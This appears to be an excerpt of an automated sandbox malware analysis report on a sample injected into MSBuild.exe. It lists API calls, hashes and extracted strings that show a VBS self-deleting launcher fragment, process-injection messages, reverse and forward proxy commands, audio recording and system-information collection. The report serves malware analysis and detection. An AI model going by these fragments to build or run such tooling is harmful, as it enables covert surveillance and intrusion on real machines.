                                                                                                                                            • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                            • API String ID: 1913171305-390638927
                                                                                                                                            • Opcode ID: dd841bb82cc608f79e660caa83b4a906fc9399d47d9f20e4a7acba44519bdb89
                                                                                                                                            • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                                                                            • Opcode Fuzzy Hash: dd841bb82cc608f79e660caa83b4a906fc9399d47d9f20e4a7acba44519bdb89
                                                                                                                                            • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                            • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                                            • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                                                                            • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                                            • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
APIs
  • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
• GetLastError.KERNEL32 ref: 00454A96
• __dosmaperr.LIBCMT ref: 00454A9D
• GetFileType.KERNEL32(00000000), ref: 00454AA9
• GetLastError.KERNEL32 ref: 00454AB3
• __dosmaperr.LIBCMT ref: 00454ABC
• CloseHandle.KERNEL32(00000000), ref: 00454ADC
• CloseHandle.KERNEL32(?), ref: 00454C26
• GetLastError.KERNEL32 ref: 00454C58
• __dosmaperr.LIBCMT ref: 00454C5F
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
APIs
• GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
• __alloca_probe_16.LIBCMT ref: 00452C91
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
• __alloca_probe_16.LIBCMT ref: 00452D3B
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
• __freea.LIBCMT ref: 00452DAA
• __freea.LIBCMT ref: 00452DB6
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
• String ID: u;~/
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• String ID: 65535$udp
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
• GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
• __dosmaperr.LIBCMT ref: 004393CD
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
• GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
• __dosmaperr.LIBCMT ref: 0043940A
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
• GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
• __dosmaperr.LIBCMT ref: 0043945E
• _free.LIBCMT ref: 0043946A
• _free.LIBCMT ref: 00439471
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
• __alloca_probe_16.LIBCMT ref: 004499E2
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
• __alloca_probe_16.LIBCMT ref: 00449AC7
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
• __freea.LIBCMT ref: 00449B37
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
• __freea.LIBCMT ref: 00449B40
• __freea.LIBCMT ref: 00449B65
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
• String ID: u;~/
APIs
• SetEvent.KERNEL32(?,?), ref: 00404E71
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
• TranslateMessage.USER32(?), ref: 00404F30
• DispatchMessageA.USER32(?), ref: 00404F3B
• HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
• HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
  • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
• String ID: CloseChat$DisplayMessage$GetMessage
APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt$u;~/
APIs
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
• CloseHandle.KERNEL32(00000000), ref: 00416F2D
• DeleteFileA.KERNEL32(00000000), ref: 00416F3C
• ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
  • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                                                            • String ID: <$@$@FG$@FG$Temp
                                                                                                                                            • API String ID: 1107811701-2245803885
                                                                                                                                            • Opcode ID: 78bafc74c7007505e7acf19461ea602378d21729afb86ac299e4c8e7541a188c
                                                                                                                                            • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                                                                            • Opcode Fuzzy Hash: 78bafc74c7007505e7acf19461ea602378d21729afb86ac299e4c8e7541a188c
                                                                                                                                            • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                                                            • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406705
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                            • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                                                            • API String ID: 2050909247-4145329354
                                                                                                                                            • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                                                            • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                                                                            • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                                                            • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                                                                            APIs
                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 221034970-0
                                                                                                                                            • Opcode ID: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                                                            • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                                                                            • Opcode Fuzzy Hash: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                                                            • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 100059EA
                                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                            • _free.LIBCMT ref: 100059F6
                                                                                                                                            • _free.LIBCMT ref: 10005A01
                                                                                                                                            • _free.LIBCMT ref: 10005A0C
                                                                                                                                            • _free.LIBCMT ref: 10005A17
                                                                                                                                            • _free.LIBCMT ref: 10005A22
                                                                                                                                            • _free.LIBCMT ref: 10005A2D
                                                                                                                                            • _free.LIBCMT ref: 10005A38
                                                                                                                                            • _free.LIBCMT ref: 10005A43
                                                                                                                                            • _free.LIBCMT ref: 10005A51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                            • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                            • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                            • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 00446DDF
                                                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                            • _free.LIBCMT ref: 00446DEB
                                                                                                                                            • _free.LIBCMT ref: 00446DF6
                                                                                                                                            • _free.LIBCMT ref: 00446E01
                                                                                                                                            • _free.LIBCMT ref: 00446E0C
                                                                                                                                            • _free.LIBCMT ref: 00446E17
                                                                                                                                            • _free.LIBCMT ref: 00446E22
                                                                                                                                            • _free.LIBCMT ref: 00446E2D
                                                                                                                                            • _free.LIBCMT ref: 00446E38
                                                                                                                                            • _free.LIBCMT ref: 00446E46
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                            • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                                                                            • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                            • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 00447EBC
                                                                                                                                            • _free.LIBCMT ref: 00447EE0
                                                                                                                                            • _free.LIBCMT ref: 00448067
                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                                                            • _free.LIBCMT ref: 00448233
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 314583886-1979702588
                                                                                                                                            • Opcode ID: 04a177aa394c08073a9100b76bd7aa64a881fee61158bcf3f639474d4cceeb7e
                                                                                                                                            • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                                                                                                            • Opcode Fuzzy Hash: 04a177aa394c08073a9100b76bd7aa64a881fee61158bcf3f639474d4cceeb7e
                                                                                                                                            • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                            • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                                                                            • _free.LIBCMT ref: 00444714
                                                                                                                                            • _free.LIBCMT ref: 0044472D
                                                                                                                                            • _free.LIBCMT ref: 0044475F
                                                                                                                                            • _free.LIBCMT ref: 00444768
                                                                                                                                            • _free.LIBCMT ref: 00444774
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: _free$ErrorLast$_abort_memcmp
• String ID: C$u;~/
• API String ID: 1679612858-2495169922
• Opcode ID: c1bf1e8f9dec5d7cfc4ae1e5b0c5bec2e7773f5590c7fa80be8f87cb2d294935
• Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
• Opcode Fuzzy Hash: c1bf1e8f9dec5d7cfc4ae1e5b0c5bec2e7773f5590c7fa80be8f87cb2d294935
• Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Eventinet_ntoa
• String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
• API String ID: 3578746661-4192532303
• Opcode ID: 740712f57a3ea757aab75bfadb8a429b272863560802bd983bc756549475bb36
• Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
• Opcode Fuzzy Hash: 740712f57a3ea757aab75bfadb8a429b272863560802bd983bc756549475bb36
• Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
APIs
• GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
• __fassign.LIBCMT ref: 0044A180
• __fassign.LIBCMT ref: 0044A19B
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
• WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
• WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID: u;~/
• API String ID: 1324828854-1979702588
• Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
• Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
• Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
• Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
APIs
• ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• Sleep.KERNEL32(00000064), ref: 00416688
• DeleteFileW.KERNEL32(00000000), ref: 004166BC
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: File$CreateDeleteExecuteShellSleep
• String ID: /t $\sysinfo.txt$dxdiag$open$temp
• API String ID: 1462127192-2001430897
• Opcode ID: cbb48963e8b1355fd2af9712d613811fc1a0336ec70d383140689dfc29f025ae
• Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
• Opcode Fuzzy Hash: cbb48963e8b1355fd2af9712d613811fc1a0336ec70d383140689dfc29f025ae
• Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
APIs
• _strftime.LIBCMT ref: 00401AD3
  • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
• waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
• waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
• waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
• String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
• API String ID: 3809562944-3643129801
• Opcode ID: a486acdecd70e56ae6275222454893cf0b15f71a35234b0713371b2576243bbe
• Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
• Opcode Fuzzy Hash: a486acdecd70e56ae6275222454893cf0b15f71a35234b0713371b2576243bbe
• Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
APIs
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
• waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
• waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
• waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
• waveInStart.WINMM ref: 00401A81
Strings
